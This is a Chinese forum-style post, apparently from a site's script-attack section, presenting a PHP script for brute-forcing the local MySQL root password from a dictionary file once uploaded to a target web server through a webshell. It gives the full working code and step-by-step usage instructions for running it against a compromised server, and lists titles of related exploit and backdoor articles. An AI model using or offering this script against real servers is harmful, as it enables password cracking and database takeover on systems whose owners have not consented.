PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口

所属分类: 网络安全 / 脚本攻防 阅读数: 830
收藏 0 赞 0 分享
传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。已知有一处Bug,不清楚为何,密码数量少的时候,准确率100%,但是当密码数量达到5000以上时,准确率0%,明明正确……

复制代码
代码如下:

<?
set_time_limit(0); //脚本不超时
$user="root"; //用户名
$passwd=file("password.txt"); //密码字典
for($i=0;$i<count($passwd);$i++){
$pass=$passwd[$i];
connect($user,$pass);
flush();
}
echo "扫描结束!";
function connect($user,$pass) {
$conn=@mysql_connect("localhost",$user,$pass);
if($conn){
echo "<font color='#0000FF'><b>得到密码:<font color='#FF0000'>".$pass."</font>!!!</b></font>";
exit();
}
else {
echo $pass.'
';
}
}
?>

代码简单的不能再简单了,就不解释了,功能很简单,传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。

已知有一处Bug,不清楚为何,密码数量少的时候,准确率100%,但是当密码数量达到5000以上时,准确率0%,明明正确的密码,却不显示正确,除非你把这个密码放在字典最末尾,才显示正确,不清楚是什么原因造成的,开始以为是暴破间隔时间太短,加了延时函数,还是这样。。。

或许只是我个别原因?各位试试就知道了。

用法:

1、修改 PHP 代码中的用户名

2、准备字典 password.txt,每行一个,理论上支持无数行。

3、将脚本和字典一起传到目标Web服务器上,访问该脚本,即开始暴力破解,破解结果实时输出,盯着就行了。
更多精彩内容其他人还在看

PHP的一个EVAL的利用防范

这篇文章主要为大家介绍下php eval的利用防范,为了安装强烈兼用少用eval函数
收藏 0 赞 0 分享

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日

近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,大家早点去官方下载补丁2014年2月28日
收藏 0 赞 0 分享

一些常见的PHP后门原理分析

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果
收藏 0 赞 0 分享

Mysql语法绕过360scan insert防注入方法

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =方法
收藏 0 赞 0 分享

科讯KESION CMS最新版任意文件上传WEBSHELL漏洞

会员上传文件漏洞,可以上传任意后缀,实现任意文件上传WEBSHELL
收藏 0 赞 0 分享

phpcms2008 代码执行 批量getshell EXP(使用菜刀)

这篇文章主要介绍了phpcms2008 代码执行 批量getshell EXP的相关资料,需要的朋友可以参考下
收藏 0 赞 0 分享

PHP多字节编码漏洞小结

这篇文章主要介绍了PHP多字节编码漏洞小结,需要的朋友可以参考下
收藏 0 赞 0 分享

防范 dedecms 广告内容插入后门

这篇文章主要介绍了防范 dedecms 广告内容插入后门,需要的朋友可以参考下
收藏 0 赞 0 分享

记一次发现利用preg_replace隐藏后门和后续探究

php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码
收藏 0 赞 0 分享

Linux系统采用netstat命令查看DDOS攻击的方法

这篇文章主要为大家介绍了Linux系统采用netstat命令查看DDOS攻击的方法,对于网络安全而言非常重要!需要的朋友可以参考下
收藏 0 赞 0 分享
查看更多